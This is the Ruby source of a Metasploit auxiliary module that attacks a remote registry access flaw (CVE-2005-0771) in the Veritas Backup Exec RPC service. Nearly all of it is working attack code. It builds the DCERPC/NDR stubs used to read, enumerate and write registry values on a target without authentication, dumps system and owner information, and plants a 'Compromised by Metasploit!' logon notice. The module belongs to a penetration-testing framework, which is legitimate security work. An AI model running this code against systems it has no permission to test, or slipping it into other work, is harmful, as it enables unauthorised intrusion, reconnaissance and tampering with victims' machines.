Path: blob/master/modules/auxiliary/admin/backupexec/registry.rb
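##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::DCERPC
  include Msf::Post::Windows::Registry

  # Size of the (status, length) header that precedes the payload in the
  # read (opnum 4) and enumerate (opnum 7) responses: two little-endian longs.
  RESP_HEADER_LEN = 8

  # Usage text shared by the console commands below.
  REGREAD_USAGE = 'Usage: regread HKLM\\\\Hardware\\\\Description\\\\System\\\\SystemBIOSVersion'
  REGENUM_USAGE = 'Usage: regenum HKLM\\\\Software'

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Veritas Backup Exec Server Registry Access',
        'Description' => %q{
          This modules exploits a remote registry access flaw in the BackupExec Windows
          Server RPC service. This vulnerability was discovered by Pedram Amini and is based
          on the NDR stub information posted to openrce.org.
          Please see the action list for the different attack modes.
        },
        'Author' => [ 'hdm' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'OSVDB', '17627' ],
          [ 'CVE', '2005-0771' ],
          [ 'URL', 'https://web.archive.org/web/20110801042138/http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=269'],
        ],
        'Actions' => [
          ['System Information', { 'Description' => 'Dump system info (user, owner, OS, CPU...)' }],
          ['Create Logon Notice', { 'Description' => 'Add a logon notice' }]
        ],
        'DefaultAction' => 'System Information',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          # The 'Create Logon Notice' action writes two Winlogon registry
          # values on the target, so the module also changes configuration.
          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        Opt::RPORT(6106),
        OptString.new(
          'WARN',
          [
            false,
            'The warning to display for the Logon Notice action',
            "Compromised by Metasploit!\r\n"
          ]
        ),
      ]
    )
  end

  # Console commands exposed by this module. 'regenum' stays unregistered
  # (the backing cmd_regenum is kept for completeness).
  def auxiliary_commands
    {
      'regread' => 'Read a registry value'
      # "regenum" => "Enumerate registry keys",
    }
  end

  # Dispatch on the selected action.
  def run
    case action.name
    when 'System Information'
      system_info
    when 'Create Logon Notice'
      logon_notice
    end
  end

  # Console command: read one registry value. Expects a single argument of the
  # form HIVE\SUBKEY\...\VALUE; a path with no value name is rejected instead
  # of being handed to the NDR encoder as nil.
  def cmd_regread(*args)
    if args.empty?
      print_status(REGREAD_USAGE)
      return
    end

    paths = args[0].split('\\')
    hive = paths.shift
    subval = paths.pop
    if hive.nil? || hive.empty? || subval.nil?
      print_error(REGREAD_USAGE)
      return
    end

    subkey = paths.join('\\')
    data = backupexec_regread(hive, subkey, subval)

    if data
      print_status("DATA: #{deunicode(data)}")
    else
      print_error("Failed to read #{hive}\\#{subkey}\\#{subval}...")
    end
  end

  # Console command: enumerate a registry key. Expects HIVE\SUBKEY...; the
  # subkey sent to the service is always prefixed with a backslash.
  def cmd_regenum(*args)
    if args.empty?
      print_status(REGENUM_USAGE)
      return
    end

    paths = args[0].split('\\')
    hive = paths.shift
    if hive.nil? || hive.empty?
      print_error(REGENUM_USAGE)
      return
    end

    subkey = '\\' + paths.join('\\')
    data = backupexec_regenum(hive, subkey)

    if data
      print_status("DATA: #{deunicode(data)}")
    else
      print_error("Failed to enumerate #{hive}\\#{subkey}...")
    end
  end

  # Action: read a handful of well-known values and print a summary. Each read
  # falls back to a placeholder when the service returns nothing.
  def system_info
    print_status('Dumping system information...')

    nt_version = 'Software\\Microsoft\\Windows NT\\CurrentVersion'

    prod_id = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows\\CurrentVersion', 'ProductId') || 'Unknown'
    prod_name = backupexec_regread('HKLM', nt_version, 'ProductName') || 'Windows (Unknown)'
    prod_sp = backupexec_regread('HKLM', nt_version, 'CSDVersion') || 'No Service Pack'
    owner = backupexec_regread('HKLM', nt_version, 'RegisteredOwner') || 'Unknown Owner'
    company = backupexec_regread('HKLM', nt_version, 'RegisteredOrganization') || 'Unknown Company'
    cpu = backupexec_regread('HKLM', 'Hardware\\Description\\System\\CentralProcessor\\0', 'ProcessorNameString') || 'Unknown CPU'
    username = backupexec_regread('HKCU', 'Software\\Microsoft\\Windows\\CurrentVersion\\Explorer', 'Logon User Name') || 'SYSTEM'

    print_status("The current interactive user is #{deunicode(username)}")
    print_status("The operating system is #{deunicode(prod_name)} #{deunicode(prod_sp)} (#{deunicode(prod_id)})")
    print_status("The system is registered to #{deunicode(owner)} of #{deunicode(company)}")
    print_status("The system runs on a #{deunicode(cpu)}")
  end

  # Action: set the Winlogon legal-notice text and caption. The write results
  # are now checked; the original ignored them and reported nothing on failure.
  def logon_notice
    warn = datastore['WARN']
    print_status("Setting the logon warning to #{warn.strip}...")

    winlogon = 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon'
    text_ok = backupexec_regwrite('HKLM', winlogon, 'LegalNoticeText', REG_SZ, warn)
    caption_ok = backupexec_regwrite('HKLM', winlogon, 'LegalNoticeCaption', REG_SZ, 'METASPLOIT')

    if text_ok && caption_ok
      print_good('Logon notice written')
    else
      print_error('Failed to set the logon notice (empty response from the service)')
    end
  end

  # Strip NUL bytes (the response strings appear to be wide-character encoded)
  # and surrounding whitespace for display.
  def deunicode(str)
    str.delete("\x00").strip
  end

  #
  # Write a registry value (opnum 5).
  #
  # Returns true when the service sent back a non-empty response; that is the
  # only success signal available from this RPC, so a true result does not
  # prove the value was stored.
  #
  def backupexec_regwrite(hive, subkey, subval, type, data)
    stub = backupexec_regrpc_write(
      hive: registry_hive_lookup(hive),
      subkey: subkey,
      subval: subval,
      type: type,
      data: data
    )
    resp = backupexec_regrpc_call(5, stub)
    !resp.empty?
  end

  #
  # Read a registry value (opnum 4).
  #
  # Returns the raw payload bytes, or nil when the call returned nothing, a
  # zero status, a zero length, or a response too short to carry a payload.
  #
  def backupexec_regread(hive, subkey, subval, type = REG_SZ)
    stub = backupexec_regrpc_read(
      hive: registry_hive_lookup(hive),
      subkey: subkey,
      subval: subval,
      type: type
    )
    resp = backupexec_regrpc_call(4, stub)
    extract_payload(resp)
  end

  #
  # Enumerate a registry key (opnum 7). Same response layout and return
  # contract as backupexec_regread. A leftover `p resp` debug print that
  # dumped the raw response to the console has been removed.
  #
  def backupexec_regenum(hive, subkey)
    stub = backupexec_regrpc_enum(
      hive: registry_hive_lookup(hive),
      subkey: subkey
    )
    resp = backupexec_regrpc_call(7, stub)
    extract_payload(resp)
  end

  #
  # Parse a read/enumerate response: a 32-bit status, a 32-bit payload length,
  # then the payload. Returns nil for an empty or header-only response, a zero
  # status or a zero length. The original unpacked the header unconditionally,
  # so a response shorter than eight bytes raised instead of returning nil.
  # A payload shorter than the advertised length is returned as-is, as before.
  #
  def extract_payload(resp)
    return nil if resp.nil? || resp.length <= RESP_HEADER_LEN

    ret, len = resp[0, RESP_HEADER_LEN].unpack('VV')
    return nil if ret == 0 || len == 0

    resp[RESP_HEADER_LEN, len]
  end

  #
  # Call the backupexec registry service.
  #
  # Binds to the registry interface over TCP, issues the call and returns the
  # response stub data ('' when there is none). The socket is now released in
  # an ensure clause, so a failed bind or call no longer leaks the connection.
  #
  def backupexec_regrpc_call(opnum, data = '')
    handle = dcerpc_handle(
      '93841fd0-16ce-11ce-850d-02608c44967b', '1.0',
      'ncacn_ip_tcp', [datastore['RPORT']]
    )

    begin
      dcerpc_bind(handle)
      dcerpc.call(opnum, data)
      dcerpc.last_response&.stub_data || ''
    ensure
      disconnect
    end
  end

  # RPC Service 4: build the read stub. The four trailing longs and the 1024
  # constant mirror the NDR layout the module was written against; their
  # meaning is not documented here.
  def backupexec_regrpc_read(opts = {})
    subkey = opts[:subkey] || ''
    subval = opts[:subval] || ''
    hive = opts[:hive] || HKEY_LOCAL_MACHINE
    type = opts[:type] || REG_SZ

    NDR.UnicodeConformantVaryingString(subkey) +
      NDR.UnicodeConformantVaryingString(subval) +
      NDR.long(type) +
      NDR.long(1024) +
      NDR.long(0) +
      NDR.long(4) +
      NDR.long(4) +
      NDR.long(hive)
  end

  # RPC Service 7: build the enumerate stub (same trailing layout as the read
  # stub, with a 4096 buffer constant).
  def backupexec_regrpc_enum(opts = {})
    subkey = opts[:subkey] || ''
    hive = opts[:hive] || HKEY_LOCAL_MACHINE

    NDR.UnicodeConformantVaryingString(subkey) +
      NDR.long(4096) +
      NDR.long(0) +
      NDR.long(4) +
      NDR.long(4) +
      NDR.long(hive)
  end

  # RPC Service 5: build the write stub. String types are NUL-terminated and
  # converted to wide characters before the length fields are computed.
  def backupexec_regrpc_write(opts = {})
    subkey = opts[:subkey] || ''
    subval = opts[:subval] || ''
    hive = opts[:hive] || HKEY_LOCAL_MACHINE
    type = opts[:type] || REG_SZ
    data = opts[:data] || ''

    data = Rex::Text.to_unicode(data + "\x00") if type == REG_SZ || type == REG_EXPAND_SZ

    NDR.UnicodeConformantVaryingString(subkey) +
      NDR.UnicodeConformantVaryingString(subval) +
      NDR.long(type) +
      NDR.long(data.length) +
      NDR.long(data.length) +
      data +
      NDR.align(data) +
      NDR.long(4) +
      NDR.long(4) +
      NDR.long(hive)
  end
end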